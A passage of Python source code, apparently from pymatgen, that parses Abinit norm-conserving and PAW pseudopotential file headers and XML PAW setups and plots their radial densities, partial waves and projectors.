#if os.path.exists(path): return path
#return None
def hint_for_accuracy(self, accuracy="normal"):
"""
Returns a :class:`Hint` object with the suggested value of ecut [Ha] and
pawecutdg [Ha] for the given accuracy.
ecut and pawecutdg are set to zero if no hint is available.
Args:
accuracy: ["low", "normal", "high"]
"""
if not self.has_dojo_report:
return Hint(ecut=0., pawecutdg=0.)
# Get hints from dojoreport. Try first in hints then in ppgen_hints.
if "hints" in self.dojo_report:
return Hint.from_dict(self.dojo_report["hints"][accuracy])
elif "ppgen_hints" in self.dojo_report:
return Hint.from_dict(self.dojo_report["ppgen_hints"][accuracy])
return Hint(ecut=0., pawecutdg=0.)
@property
def has_hints(self):
"""
True if self provides hints on the cutoff energy.
"""
for acc in ["low", "normal", "high"]:
try:
if self.hint_for_accuracy(acc) is None:
return False
except KeyError:
return False
return True
def open_pspsfile(self, ecut=20, pawecutdg=None):
"""
Calls Abinit to compute the internal tables for the application of the
pseudopotential part. Returns :class:`PspsFile` object providing methods
to plot and analyze the data or None if file is not found or it's not readable.
Args:
ecut: Cutoff energy in Hartree.
pawecutdg: Cutoff energy for the PAW double grid.
"""
from pymatgen.io.abinit.tasks import AbinitTask
from abipy.core.structure import Structure
from abipy.abio.factories import gs_input
from abipy.electrons.psps import PspsFile
# Build fake structure.
lattice = 10 * np.eye(3)
structure = Structure(lattice, [self.element], coords=[[0, 0, 0]])
if self.ispaw and pawecutdg is None: pawecutdg = ecut * 4
inp = gs_input(structure, pseudos=[self], ecut=ecut, pawecutdg=pawecutdg,
spin_mode="unpolarized", kppa=1)
# Add prtpsps = -1 to make Abinit print the PSPS.nc file and stop.
inp["prtpsps"] = -1
# Build temporary task and run it (ignore retcode because we don't exit cleanly)
task = AbinitTask.temp_shell_task(inp)
task.start_and_wait()
filepath = task.outdir.has_abiext("_PSPS.nc")
if not filepath:
logger.critical("Cannot find PSPS.nc file in %s" % task.outdir)
return None
# Open the PSPS.nc file.
try:
return PspsFile(filepath)
except Exception as exc:
logger.critical("Exception while reading PSPS file at %s:\n%s" % (filepath, str(exc)))
return None
class NcPseudo(metaclass=abc.ABCMeta):
"""
Abstract class defining the methods that must be implemented
by the concrete classes representing norm-conserving pseudopotentials.
"""
@property
@abc.abstractmethod
def nlcc_radius(self):
"""
Radius at which the core charge vanish (i.e. cut-off in a.u.).
Returns 0.0 if nlcc is not used.
"""
@property
def has_nlcc(self):
"""True if the pseudo is generated with non-linear core correction."""
return self.nlcc_radius > 0.0
@property
def rcore(self):
"""Radius of the pseudization sphere in a.u."""
try:
return self._core
except AttributeError:
return None
class PawPseudo(metaclass=abc.ABCMeta):
"""
Abstract class that defines the methods that must be implemented
by the concrete classes representing PAW pseudopotentials.
"""
#def nlcc_radius(self):
# """
# Radius at which the core charge vanish (i.e. cut-off in a.u.).
# Returns 0.0 if nlcc is not used.
# """
# return 0.0
#
#@property
#def has_nlcc(self):
# """True if the pseudo is generated with non-linear core correction."""
# return True
@property
@abc.abstractmethod
def paw_radius(self):
"""Radius of the PAW sphere in a.u."""
@property
def rcore(self):
"""Alias of paw_radius."""
return self.paw_radius
class AbinitPseudo(Pseudo):
"""
An AbinitPseudo is a pseudopotential whose file contains an abinit header.
"""
def __init__(self, path, header):
"""
Args:
path: Filename.
header: :class:`AbinitHeader` instance.
"""
self.path = path
self.header = header
self._summary = header.summary
# Build xc from header.
self.xc = XcFunc.from_abinit_ixc(header["pspxc"])
for attr_name, desc in header.items():
value = header.get(attr_name, None)
# Hide these attributes since one should always use the public interface.
setattr(self, "_" + attr_name, value)
@property
def summary(self):
"""Summary line reported in the ABINIT header."""
return self._summary.strip()
@property
def Z(self):
return self._zatom
@property
def Z_val(self):
return self._zion
@property
def l_max(self):
return self._lmax
@property
def l_local(self):
return self._lloc
@property
def supports_soc(self):
# Treate ONCVPSP pseudos
if self._pspcod == 8:
switch = self.header["extension_switch"]
if switch in (0, 1): return False
if switch in (2, 3): return True
raise ValueError("Don't know how to handle extension_switch: %s" % switch)
# TODO Treat HGH HGHK pseudos
# As far as I know, other Abinit pseudos do not support SOC.
return False
class NcAbinitPseudo(NcPseudo, AbinitPseudo):
"""Norm-conserving pseudopotential in the Abinit format."""
@property
def summary(self):
return self._summary.strip()
@property
def Z(self):
return self._zatom
@property
def Z_val(self):
"""Number of valence electrons."""
return self._zion
@property
def l_max(self):
return self._lmax
@property
def l_local(self):
return self._lloc
@property
def nlcc_radius(self):
return self._rchrg
class PawAbinitPseudo(PawPseudo, AbinitPseudo):
"""Paw pseudopotential in the Abinit format."""
@property
def paw_radius(self):
return self._r_cut
#def orbitals(self):
@property
def supports_soc(self):
return True
class Hint:
"""
Suggested value for the cutoff energy [Hartree units]
and the cutoff energy for the dense grid (only for PAW pseudos).
"""
def __init__(self, ecut, pawecutdg=None):
self.ecut = ecut
self.pawecutdg = ecut if pawecutdg is None else pawecutdg
def __str__(self):
if self.pawecutdg is not None:
return "ecut: %s, pawecutdg: %s" % (self.ecut, self.pawecutdg)
else:
return "ecut: %s" % (self.ecut)
@pmg_serialize
def as_dict(self):
return dict(ecut=self.ecut, pawecutdg=self.pawecutdg)
@classmethod
def from_dict(cls, d):
return cls(**{k: v for k, v in d.items() if not k.startswith("@")})
def _dict_from_lines(lines, key_nums, sep=None):
"""
Helper function to parse formatted text structured like:
value1 value2 ... sep key1, key2 ...
key_nums is a list giving the number of keys for each line. 0 if line should be skipped.
sep is a string denoting the character that separates the keys from the value (None if
no separator is present).
Returns:
dict{key1 : value1, key2 : value2, ...}
Raises:
ValueError if parsing fails.
"""
if is_string(lines):
lines = [lines]
if not isinstance(key_nums, collections.abc.Iterable):
key_nums = list(key_nums)
if len(lines) != len(key_nums):
err_msg = "lines = %s\n key_num = %s" % (str(lines), str(key_nums))
raise ValueError(err_msg)
kwargs = Namespace()
for (i, nk) in enumerate(key_nums):
if nk == 0: continue
line = lines[i]
tokens = [t.strip() for t in line.split()]
values, keys = tokens[:nk], "".join(tokens[nk:])
# Sanitize keys: In some case we might get strings in the form: foo[,bar]
keys.replace("[", "").replace("]", "")
keys = keys.split(",")
if sep is not None:
check = keys[0][0]
if check != sep:
raise ValueError("Expecting separator %s, got %s" % (sep, check))
keys[0] = keys[0][1:]
if len(values) != len(keys):
msg = "line: %s\n len(keys) != len(value)\nkeys: %s\n values: %s" % (line, keys, values)
raise ValueError(msg)
kwargs.update(zip(keys, values))
return kwargs
class AbinitHeader(dict):
"""Dictionary whose keys can be also accessed as attributes."""
def __getattr__(self, name):
try:
# Default behaviour
return super(AbinitHeader, self).__getattribute__(name)
except AttributeError:
try:
# Try in the dictionary.
return self[name]
except KeyError as exc:
raise AttributeError(str(exc))
def _int_from_str(string):
"""
Convert string into integer
Raise:
TypeError if string is not a valid integer
"""
float_num = float(string)
int_num = int(float_num)
if float_num == int_num:
return int_num
else:
# Needed to handle pseudos with fractional charge
int_num = np.rint(float_num)
logger.warning("Converting float %s to int %s" % (float_num, int_num))
return int_num
class NcAbinitHeader(AbinitHeader):
"""The abinit header found in the NC pseudopotential files."""
_attr_desc = namedtuple("att", "default astype")
_VARS = {
# Mandatory
"zatom": _attr_desc(None, _int_from_str),
"zion": _attr_desc(None, float),
"pspdat": _attr_desc(None, float),
"pspcod": _attr_desc(None, int),
"pspxc": _attr_desc(None, int),
"lmax": _attr_desc(None, int),
"lloc": _attr_desc(None, int),
"r2well": _attr_desc(None, float),
"mmax": _attr_desc(None, float),
# Optional variables for non linear-core correction. HGH does not have it.
"rchrg": _attr_desc(0.0, float), # radius at which the core charge vanish (i.e. cut-off in a.u.)
"fchrg": _attr_desc(0.0, float),
"qchrg": _attr_desc(0.0, float),
}
del _attr_desc
def __init__(self, summary, **kwargs):
super(NcAbinitHeader, self).__init__()
# pseudos generated by APE use llocal instead of lloc.
if "llocal" in kwargs:
kwargs["lloc"] = kwargs.pop("llocal")
self.summary = summary.strip()
for key, desc in NcAbinitHeader._VARS.items():
default, astype = desc.default, desc.astype
value = kwargs.pop(key, None)
if value is None:
value = default
if default is None:
raise RuntimeError("Attribute %s must be specified" % key)
else:
try:
value = astype(value)
except:
raise RuntimeError("Conversion Error for key %s, value %s" % (key, value))
self[key] = value
# Add remaining arguments, e.g. extension_switch
if kwargs:
self.update(kwargs)
@staticmethod
def fhi_header(filename, ppdesc):
"""
Parse the FHI abinit header. Example:
Troullier-Martins psp for element Sc Thu Oct 27 17:33:22 EDT 1994
21.00000 3.00000 940714 zatom, zion, pspdat
1 1 2 0 2001 .00000 pspcod,pspxc,lmax,lloc,mmax,r2well
1.80626423934776 .22824404341771 1.17378968127746 rchrg,fchrg,qchrg
"""
lines = _read_nlines(filename, 4)
try:
header = _dict_from_lines(lines[:4], [0, 3, 6, 3])
except ValueError:
# The last record with rchrg ... seems to be optional.
header = _dict_from_lines(lines[:3], [0, 3, 6])
summary = lines[0]
return NcAbinitHeader(summary, **header)
@staticmethod
def hgh_header(filename, ppdesc):
"""
Parse the HGH abinit header. Example:
Hartwigsen-Goedecker-Hutter psp for Ne, from PRB58, 3641 (1998)
10 8 010605 zatom,zion,pspdat
3 1 1 0 2001 0 pspcod,pspxc,lmax,lloc,mmax,r2well
"""
lines = _read_nlines(filename, 3)
header = _dict_from_lines(lines[:3], [0, 3, 6])
summary = lines[0]
return NcAbinitHeader(summary, **header)
@staticmethod
def gth_header(filename, ppdesc):
"""
Parse the GTH abinit header. Example:
Goedecker-Teter-Hutter Wed May 8 14:27:44 EDT 1996
1 1 960508 zatom,zion,pspdat
2 1 0 0 2001 0. pspcod,pspxc,lmax,lloc,mmax,r2well
0.2000000 -4.0663326 0.6778322 0 0 rloc, c1, c2, c3, c4
0 0 0 rs, h1s, h2s
0 0 rp, h1p
1.36 .2 0.6 rcutoff, rloc
"""
lines = _read_nlines(filename, 7)
header = _dict_from_lines(lines[:3], [0, 3, 6])
summary = lines[0]
return NcAbinitHeader(summary, **header)
@staticmethod
def oncvpsp_header(filename, ppdesc):
"""
Parse the ONCVPSP abinit header. Example:
Li ONCVPSP r_core= 2.01 3.02
3.0000 3.0000 140504 zatom,zion,pspd
8 2 1 4 600 0 pspcod,pspxc,lmax,lloc,mmax,r2well
5.99000000 0.00000000 0.00000000 rchrg fchrg qchrg
2 2 0 0 0 nproj
0 extension_switch
0 -2.5000025868368D+00 -1.2006906995331D+00
1 0.0000000000000D+00 0.0000000000000D+00 0.0000000000000D+00
2 1.0000000000000D-02 4.4140499497377D-02 1.9909081701712D-02
"""
lines = _read_nlines(filename, 6)
header = _dict_from_lines(lines[:3], [0, 3, 6])
summary = lines[0]
# Replace pspd with pspdata
header.update({'pspdat': header['pspd']})
header.pop('pspd')
# Read extension switch
header["extension_switch"] = int(lines[5].split()[0])
return NcAbinitHeader(summary, **header)
@staticmethod
def tm_header(filename, ppdesc):
"""
Parse the TM abinit header. Example:
Troullier-Martins psp for element Fm Thu Oct 27 17:28:39 EDT 1994
100.00000 14.00000 940714 zatom, zion, pspdat
1 1 3 0 2001 .00000 pspcod,pspxc,lmax,lloc,mmax,r2well
0 4.085 6.246 0 2.8786493 l,e99.0,e99.9,nproj,rcpsp
.00000000 .0000000000 .0000000000 .00000000 rms,ekb1,ekb2,epsatm
1 3.116 4.632 1 3.4291849 l,e99.0,e99.9,nproj,rcpsp
.00000000 .0000000000 .0000000000 .00000000 rms,ekb1,ekb2,epsatm
2 4.557 6.308 1 2.1865358 l,e99.0,e99.9,nproj,rcpsp
.00000000 .0000000000 .0000000000 .00000000 rms,ekb1,ekb2,epsatm
3 23.251 29.387 1 2.4776730 l,e99.0,e99.9,nproj,rcpsp
.00000000 .0000000000 .0000000000 .00000000 rms,ekb1,ekb2,epsatm
3.62474762267880 .07409391739104 3.07937699839200 rchrg,fchrg,qchrg
"""
lines = _read_nlines(filename, -1)
header = []
for lineno, line in enumerate(lines):
header.append(line)
if lineno == 2:
# Read lmax.
tokens = line.split()
pspcod, pspxc, lmax, lloc = map(int, tokens[:4])
mmax, r2well = map(float, tokens[4:6])
#if tokens[-1].strip() != "pspcod,pspxc,lmax,lloc,mmax,r2well":
# raise RuntimeError("%s: Invalid line\n %s" % (filename, line))
lines = lines[3:]
break
# TODO
# Parse the section with the projectors.
#0 4.085 6.246 0 2.8786493 l,e99.0,e99.9,nproj,rcpsp
#.00000000 .0000000000 .0000000000 .00000000 rms,ekb1,ekb2,epsatm
projectors = OrderedDict()
for idx in range(2*(lmax+1)):
line = lines[idx]
if idx % 2 == 0: proj_info = [line,]
if idx % 2 == 1:
proj_info.append(line)
d = _dict_from_lines(proj_info, [5,4])
projectors[int(d["l"])] = d
# Add the last line with info on nlcc.
header.append(lines[idx+1])
summary = header[0]
header = _dict_from_lines(header, [0,3,6,3])
return NcAbinitHeader(summary, **header)
class PawAbinitHeader(AbinitHeader):
"""The abinit header found in the PAW pseudopotential files."""
_attr_desc = namedtuple("att", "default astype")
_VARS = {
"zatom": _attr_desc(None, _int_from_str),
"zion": _attr_desc(None, float),
"pspdat": _attr_desc(None, float),
"pspcod": _attr_desc(None, int),
"pspxc": _attr_desc(None, int),
"lmax": _attr_desc(None, int),
"lloc": _attr_desc(None, int),
"mmax": _attr_desc(None, int),
"r2well": _attr_desc(None, float),
"pspfmt": _attr_desc(None, str),
"creatorID": _attr_desc(None, int),
"basis_size": _attr_desc(None, int),
"lmn_size": _attr_desc(None, int),
"orbitals": _attr_desc(None, list),
"number_of_meshes": _attr_desc(None, int),
"r_cut": _attr_desc(None, float), # r_cut(PAW) in the header
"shape_type": _attr_desc(None, int),
"rshape": _attr_desc(None, float),
}
del _attr_desc
def __init__(self, summary, **kwargs):
super(PawAbinitHeader, self).__init__()
self.summary = summary.strip()
for key, desc in self._VARS.items():
default, astype = desc.default, desc.astype
value = kwargs.pop(key, None)
if value is None:
value = default
if default is None:
raise RuntimeError("Attribute %s must be specified" % key)
else:
try:
value = astype(value)
except:
raise RuntimeError("Conversion Error for key %s, with value %s" % (key, value))
self[key] = value
if kwargs:
raise RuntimeError("kwargs should be empty but got %s" % str(kwargs))
@staticmethod
def paw_header(filename, ppdesc):
"""
Parse the PAW abinit header. Examples:
Paw atomic data for element Ni - Generated by AtomPAW (N. Holzwarth) + AtomPAW2Abinit v3.0.5
28.000 18.000 20061204 : zatom,zion,pspdat
7 7 2 0 350 0. : pspcod,pspxc,lmax,lloc,mmax,r2well
paw3 1305 : pspfmt,creatorID
5 13 : basis_size,lmn_size
0 0 1 1 2 : orbitals
3 : number_of_meshes
1 3 350 1.1803778368E-05 3.5000000000E-02 : mesh 1, type,size,rad_step[,log_step]
2 1 921 2.500000000000E-03 : mesh 2, type,size,rad_step[,log_step]
3 3 391 1.1803778368E-05 3.5000000000E-02 : mesh 3, type,size,rad_step[,log_step]
2.3000000000 : r_cut(SPH)
2 0.
Another format:
C (US d-loc) - PAW data extracted from US-psp (D.Vanderbilt) - generated by USpp2Abinit v2.3.0
6.000 4.000 20090106 : zatom,zion,pspdat
7 11 1 0 560 0. : pspcod,pspxc,lmax,lloc,mmax,r2well
paw4 2230 : pspfmt,creatorID
4 8 : basis_size,lmn_size
0 0 1 1 : orbitals
5 : number_of_meshes
1 2 560 1.5198032759E-04 1.6666666667E-02 : mesh 1, type,size,rad_step[,log_step]
2 2 556 1.5198032759E-04 1.6666666667E-02 : mesh 2, type,size,rad_step[,log_step]
3 2 576 1.5198032759E-04 1.6666666667E-02 : mesh 3, type,size,rad_step[,log_step]
4 2 666 1.5198032759E-04 1.6666666667E-02 : mesh 4, type,size,rad_step[,log_step]
5 2 673 1.5198032759E-04 1.6666666667E-02 : mesh 5, type,size,rad_step[,log_step]
1.5550009124 : r_cut(PAW)
3 0. : shape_type,rshape
Yet nnother one:
Paw atomic data for element Si - Generated by atompaw v3.0.1.3 & AtomPAW2Abinit v3.3.1
14.000 4.000 20120814 : zatom,zion,pspdat
7 11 1 0 663 0. : pspcod,pspxc,lmax,lloc,mmax,r2well
paw5 1331 : pspfmt,creatorID
4 8 : basis_size,lmn_size
0 0 1 1 : orbitals
5 : number_of_meshes
1 2 663 8.2129718540404674E-04 1.1498160595656655E-02 : mesh 1, type,size,rad_step[,log_step]
2 2 658 8.2129718540404674E-04 1.1498160595656655E-02 : mesh 2, type,size,rad_step[,log_step]
3 2 740 8.2129718540404674E-04 1.1498160595656655E-02 : mesh 3, type,size,rad_step[,log_step]
4 2 819 8.2129718540404674E-04 1.1498160595656655E-02 : mesh 4, type,size,rad_step[,log_step]
5 2 870 8.2129718540404674E-04 1.1498160595656655E-02 : mesh 5, type,size,rad_step[,log_step]
1.5669671236 : r_cut(PAW)
2 0. : shape_type,rshape
"""
supported_formats = ["paw3", "paw4", "paw5"]
if ppdesc.format not in supported_formats:
raise NotImplementedError("format %s not in %s" % (ppdesc.format, supported_formats))
lines = _read_nlines(filename, -1)
summary = lines[0]
header = _dict_from_lines(lines[:5], [0, 3, 6, 2, 2], sep=":")
lines = lines[5:]
# TODO
# Parse orbitals and number of meshes.
header["orbitals"] = [int(t) for t in lines[0].split(":")[0].split()]
header["number_of_meshes"] = num_meshes = int(lines[1].split(":")[0])
#print filename, header
# Skip meshes =
lines = lines[2+num_meshes:]
#for midx in range(num_meshes):
# l = midx + 1
#print lines[0]
header["r_cut"] = float(lines[0].split(":")[0])
#print lines[1]
header.update(_dict_from_lines(lines[1], [2], sep=":"))
#print("PAW header\n", header)
return PawAbinitHeader(summary, **header)
class PseudoParserError(Exception):
"""Base Error class for the exceptions raised by :class:`PseudoParser`"""
class PseudoParser:
"""
Responsible for parsing pseudopotential files and returning pseudopotential objects.
Usage::
pseudo = PseudoParser().parse("filename")
"""
Error = PseudoParserError
# Supported values of pspcod
ppdesc = namedtuple("ppdesc", "pspcod name psp_type format")
# TODO Recheck
_PSPCODES = OrderedDict( {
1: ppdesc(1, "TM", "NC", None),
2: ppdesc(2, "GTH", "NC", None),
3: ppdesc(3, "HGH", "NC", None),
4: ppdesc(4, "Teter", "NC", None),
#5: ppdesc(5, "NC", , None),
6: ppdesc(6, "FHI", "NC", None),
7: ppdesc(6, "PAW_abinit_text", "PAW", None),
8: ppdesc(8, "ONCVPSP", "NC", None),
10: ppdesc(10, "HGHK", "NC", None),
})
del ppdesc
# renumber functionals from oncvpsp todo confrim that 3 is 2
#_FUNCTIONALS = {1: {'n': 4, 'name': 'Wigner'},
# 2: {'n': 5, 'name': 'HL'},
# 3: {'n': 2, 'name': 'PWCA'},
# 4: {'n': 11, 'name': 'PBE'}}
def __init__(self):
# List of files that have been parsed succesfully.
self._parsed_paths = []
# List of files that could not been parsed.
self._wrong_paths = []
def scan_directory(self, dirname, exclude_exts=(), exclude_fnames=()):
"""
Analyze the files contained in directory dirname.
Args:
dirname: directory path
exclude_exts: list of file extensions that should be skipped.
exclude_fnames: list of file names that should be skipped.
Returns:
List of pseudopotential objects.
"""
for i, ext in enumerate(exclude_exts):
if not ext.strip().startswith("."):
exclude_exts[i] = "." + ext.strip()
# Exclude files depending on the extension.
paths = []
for fname in os.listdir(dirname):
root, ext = os.path.splitext(fname)
path = os.path.join(dirname, fname)
if (ext in exclude_exts or fname in exclude_fnames or
fname.startswith(".") or not os.path.isfile(path)): continue
paths.append(path)
pseudos = []
for path in paths:
# Parse the file and generate the pseudo.
try:
pseudo = self.parse(path)
except:
pseudo = None
if pseudo is not None:
pseudos.append(pseudo)
self._parsed_paths.extend(path)
else:
self._wrong_paths.extend(path)
return pseudos
def read_ppdesc(self, filename):
"""
Read the pseudopotential descriptor from file filename.
Returns:
Pseudopotential descriptor. None if filename is not a valid pseudopotential file.
Raises:
`PseudoParserError` if fileformat is not supported.
"""
if filename.endswith(".xml"):
raise self.Error("XML pseudo not supported yet")
else:
# Assume file with the abinit header.
lines = _read_nlines(filename, 80)
for lineno, line in enumerate(lines):
if lineno == 2:
try:
tokens = line.split()
pspcod, pspxc = map(int, tokens[:2])
except:
msg = "%s: Cannot parse pspcod, pspxc in line\n %s" % (filename, line)
logger.critical(msg)
return None
#if tokens[-1].strip().replace(" ","") not in ["pspcod,pspxc,lmax,lloc,mmax,r2well",
# "pspcod,pspxc,lmax,llocal,mmax,r2well"]:
# raise self.Error("%s: Invalid line\n %s" % (filename, line))
# return None
if pspcod not in self._PSPCODES:
raise self.Error("%s: Don't know how to handle pspcod %s\n" % (filename, pspcod))
ppdesc = self._PSPCODES[pspcod]
if pspcod == 7:
# PAW -> need to know the format pspfmt
tokens = lines[lineno+1].split()
pspfmt, creatorID = tokens[:2]
#if tokens[-1].strip() != "pspfmt,creatorID":
# raise self.Error("%s: Invalid line\n %s" % (filename, line))
# return None
ppdesc = ppdesc._replace(format = pspfmt)
return ppdesc
return None
def parse(self, filename):
"""
Read and parse a pseudopotential file. Main entry point for client code.
Returns:
pseudopotential object or None if filename is not a valid pseudopotential file.
"""
path = os.path.abspath(filename)
# Only PAW supports XML at present.
if filename.endswith(".xml"):
return PawXmlSetup(path)
ppdesc = self.read_ppdesc(path)
if ppdesc is None:
logger.critical("Cannot find ppdesc in %s" % path)
return None
psp_type = ppdesc.psp_type
parsers = {
"FHI": NcAbinitHeader.fhi_header,
"GTH": NcAbinitHeader.gth_header,
"TM": NcAbinitHeader.tm_header,
"Teter": NcAbinitHeader.tm_header,
"HGH": NcAbinitHeader.hgh_header,
"HGHK": NcAbinitHeader.hgh_header,
"ONCVPSP": NcAbinitHeader.oncvpsp_header,
"PAW_abinit_text": PawAbinitHeader.paw_header,
}
try:
header = parsers[ppdesc.name](path, ppdesc)
except Exception:
raise self.Error(path + ":\n" + straceback())
if psp_type == "NC":
pseudo = NcAbinitPseudo(path, header)
elif psp_type == "PAW":
pseudo = PawAbinitPseudo(path, header)
else:
raise NotImplementedError("psp_type not in [NC, PAW]")
return pseudo
#TODO use RadialFunction from pseudo_dojo.
class RadialFunction(namedtuple("RadialFunction", "mesh values")):
pass
class PawXmlSetup(Pseudo, PawPseudo):
def __init__(self, filepath):
self.path = os.path.abspath(filepath)
# Get the XML root (this trick is used to that the object is pickleable).
root = self.root
# Get the version of the XML format
self.paw_setup_version = root.get("version")
# Info on the atom.
atom_attrib = root.find("atom").attrib
#self._symbol = atom_attrib["symbol"]
self._zatom = int(float(atom_attrib["Z"]))
self.core, self.valence = map(float, [atom_attrib["core"], atom_attrib["valence"]])
# Build xc from header.
xc_info = root.find("xc_functional").attrib
self.xc = XcFunc.from_type_name(xc_info["type"], xc_info["name"])
# Old XML files do not define this field!
# In this case we set the PAW radius to None.
#self._paw_radius = float(root.find("PAW_radius").attrib["rpaw"])
#self.ae_energy = {k: float(v) for k,v in root.find("ae_energy").attrib.items()}
pawr_element = root.find("PAW_radius")
self._paw_radius = None
if pawr_element is not None:
self._paw_radius = float(pawr_element.attrib["rpaw"])
#<valence_states>
# <state n="2" l="0" f="2" rc="1.10" e="-0.6766" id="N-2s"/>
# <state n="2" l="1" f="3" rc="1.10" e="-0.2660" id="N-2p"/>
# <state l="0" rc="1.10" e=" 0.3234" id="N-s1"/>
# <state l="1" rc="1.10" e=" 0.7340" id="N-p1"/>
# <state l="2" rc="1.10" e=" 0.0000" id="N-d1"/>
#</valence_states>
#
# The valence_states element contains several state elements.
# For this setup, the first two lines describe bound eigenstates
# with occupation numbers and principal quantum numbers.
# Notice, that the three additional unbound states should have no f and n attributes.
# In this way, we know that only the first two bound states (with f and n attributes)
# should be used for constructing an initial guess for the wave functions.
self.valence_states = OrderedDict()
for node in root.find("valence_states"):
attrib = AttrDict(node.attrib)
assert attrib.id not in self.valence_states
self.valence_states[attrib.id] = attrib
#print(self.valence_states)
# Parse the radial grids
self.rad_grids = {}
for node in root.findall("radial_grid"):
grid_params = node.attrib
gid = grid_params["id"]
assert gid not in self.rad_grids
self.rad_grids[gid] = self._eval_grid(grid_params)
def __getstate__(self):
"""
Return state is pickled as the contents for the instance.
In this case we just remove the XML root element process since Element object cannot be pickled.
"""
return {k: v for k, v in self.__dict__.items() if k not in ["_root"]}
@lazy_property
def root(self):
from xml.etree import cElementTree as Et
tree = Et.parse(self.filepath)
return tree.getroot()
@property
def Z(self):
return self._zatom
@property
def Z_val(self):
"""Number of valence electrons."""
return self.valence
# FIXME
@property
def l_max(self):
"""Maximum angular momentum."""
return None
@property
def l_local(self):
"""Angular momentum used for the local part."""
return None
@property
def summary(self):
"""String summarizing the most important properties."""
return ""
@property
def paw_radius(self):
return self._paw_radius
@property
def supports_soc(self):
"""
Here I assume that the ab-initio code can treat the SOC within the on-site approximation
"""
return True
@staticmethod
def _eval_grid(grid_params):
"""
This function receives a dictionary with the parameters defining the
radial mesh and returns a `ndarray` with the mesh
"""
eq = grid_params.get("eq").replace(" ", "")
istart, iend = int(grid_params.get("istart")), int(grid_params.get("iend"))
indices = list(range(istart, iend+1))
if eq == 'r=a*exp(d*i)':
a, d = float(grid_params['a']), float(grid_params['d'])
mesh = [a * np.exp(d * i) for i in indices]
elif eq == 'r=a*i/(n-i)':
a, n = float(grid_params['a']), float(grid_params['n'])
mesh = [a * i / (n - i) for i in indices]
elif eq == 'r=a*(exp(d*i)-1)':
a, d = float(grid_params['a']), float(grid_params['d'])
mesh = [a * (np.exp(d * i) - 1.0) for i in indices]
elif eq == 'r=d*i':
d = float(grid_params['d'])
mesh = [d * i for i in indices]
elif eq == 'r=(i/n+a)^5/a-a^4':
a, n = float(grid_params['a']), float(grid_params['n'])
mesh = [(i / n + a)**5 / a - a**4 for i in indices]
else:
raise ValueError('Unknown grid type: %s' % eq)
return np.array(mesh)
def _parse_radfunc(self, func_name):
"""Parse the first occurence of func_name in the XML file."""
node = self.root.find(func_name)
grid = node.attrib["grid"]
values = np.array([float(s) for s in node.text.split()])
return self.rad_grids[grid], values, node.attrib
def _parse_all_radfuncs(self, func_name):
"""Parse all the nodes with tag func_name in the XML file."""
for node in self.root.findall(func_name):
grid = node.attrib["grid"]
values = np.array([float(s) for s in node.text.split()])
yield self.rad_grids[grid], values, node.attrib
@lazy_property
def ae_core_density(self):
"""The all-electron radial density."""
mesh, values, attrib = self._parse_radfunc("ae_core_density")
return RadialFunction(mesh, values)
@lazy_property
def pseudo_core_density(self):
"""The pseudized radial density."""
mesh, values, attrib = self._parse_radfunc("pseudo_core_density")
return RadialFunction(mesh, values)
@lazy_property
def ae_partial_waves(self):
"""Dictionary with the AE partial waves indexed by state."""
ae_partial_waves = OrderedDict()
for mesh, values, attrib in self._parse_all_radfuncs("ae_partial_wave"):
state = attrib["state"]
#val_state = self.valence_states[state]
ae_partial_waves[state] = RadialFunction(mesh, values)
return ae_partial_waves
@property
def pseudo_partial_waves(self):
"""Dictionary with the pseudo partial waves indexed by state."""
pseudo_partial_waves = OrderedDict()
for (mesh, values, attrib) in self._parse_all_radfuncs("pseudo_partial_wave"):
state = attrib["state"]
#val_state = self.valence_states[state]
pseudo_partial_waves[state] = RadialFunction(mesh, values)
return pseudo_partial_waves
@lazy_property
def projector_functions(self):
"""Dictionary with the PAW projectors indexed by state."""
projector_functions = OrderedDict()
for (mesh, values, attrib) in self._parse_all_radfuncs("projector_function"):
state = attrib["state"]
#val_state = self.valence_states[state]
projector_functions[state] = RadialFunction(mesh, values)
return projector_functions
def yield_figs(self, **kwargs): # pragma: no cover
"""
This function *generates* a predefined list of matplotlib figures with minimal input from the user.
"""
yield self.plot_densities(title="PAW densities", show=False)
yield self.plot_waves(title="PAW waves", show=False)
yield self.plot_projectors(title="PAW projectors", show=False)
#yield self.plot_potentials(title="potentials", show=False)
@add_fig_kwargs
def plot_densities(self, ax=None, **kwargs):
"""
Plot the PAW densities.
Args:
ax: matplotlib :class:`Axes` or None if a new figure should be created.
Returns:
`matplotlib` figure
"""
ax, fig, plt = get_ax_fig_plt(ax)
ax.grid(True)
ax.set_xlabel('r [Bohr]')
#ax.set_ylabel('density')
for i, den_name in enumerate(["ae_core_density", "pseudo_core_density"]):
rden = getattr(self, den_name)
label = "$n_c$" if i == 1 else r"$\tilde{n}_c$"
ax.plot(rden.mesh, rden.mesh * rden.values, label=label, lw=2)
ax.legend(loc="best")
return fig
@add_fig_kwargs
def plot_waves(self, ax=None, fontsize=12, **kwargs):
"""
Plot the AE and the pseudo partial waves.
Args:
ax: matplotlib :class:`Axes` or None if a new figure should be created.
fontsize: fontsize for legends and titles
Returns: `matplotlib` figure
"""
ax, fig, plt = get_ax_fig_plt(ax)
ax.grid(True)
ax.set_xlabel("r [Bohr]")
ax.set_ylabel(r"$r\phi,\, r\tilde\phi\, [Bohr]^{-\frac{1}{2}}$")
#ax.axvline(x=self.paw_radius, linewidth=2, color='k', linestyle="--")
#ax.annotate("$r_c$", xy=(self.paw_radius + 0.1, 0.1))
for state, rfunc in self.pseudo_partial_waves.items():
ax.plot(rfunc.mesh, rfunc.mesh * rfunc.values, lw=2, label="PS-WAVE: " + state)
for state, rfunc in self.ae_partial_waves.items():
ax.plot(rfunc.mesh, rfunc.mesh * rfunc.values, lw=2, label="AE-WAVE: " + state)
ax.legend(loc="best", shadow=True, fontsize=fontsize)
return fig
@add_fig_kwargs
def plot_projectors(self, ax=None, fontsize=12, **kwargs):
"""
Plot the PAW projectors.
Args:
ax: matplotlib :class:`Axes` or None if a new figure should be created.
Returns: `matplotlib` figure
"""
ax, fig, plt = get_ax_fig_plt(ax)
title = kwargs.pop("title", "Projectors")
ax.grid(True)
ax.set_xlabel('r [Bohr]')
ax.set_ylabel(r"$r\tilde p\, [Bohr]^{-\frac{1}{2}}$")
#ax.axvline(x=self.paw_radius, linewidth=2, color='k', linestyle="--")
#ax.annotate("$r_c$", xy=(self.paw_radius + 0.1, 0.1))
for state, rfunc in self.projector_functions.items():
ax.plot(rfunc.mesh, rfunc.mesh * rfunc.values, label="TPROJ: " + state)
ax.legend(loc="best", shadow=True, fontsize=fontsize)
return fig
#@add_fig_kwargs
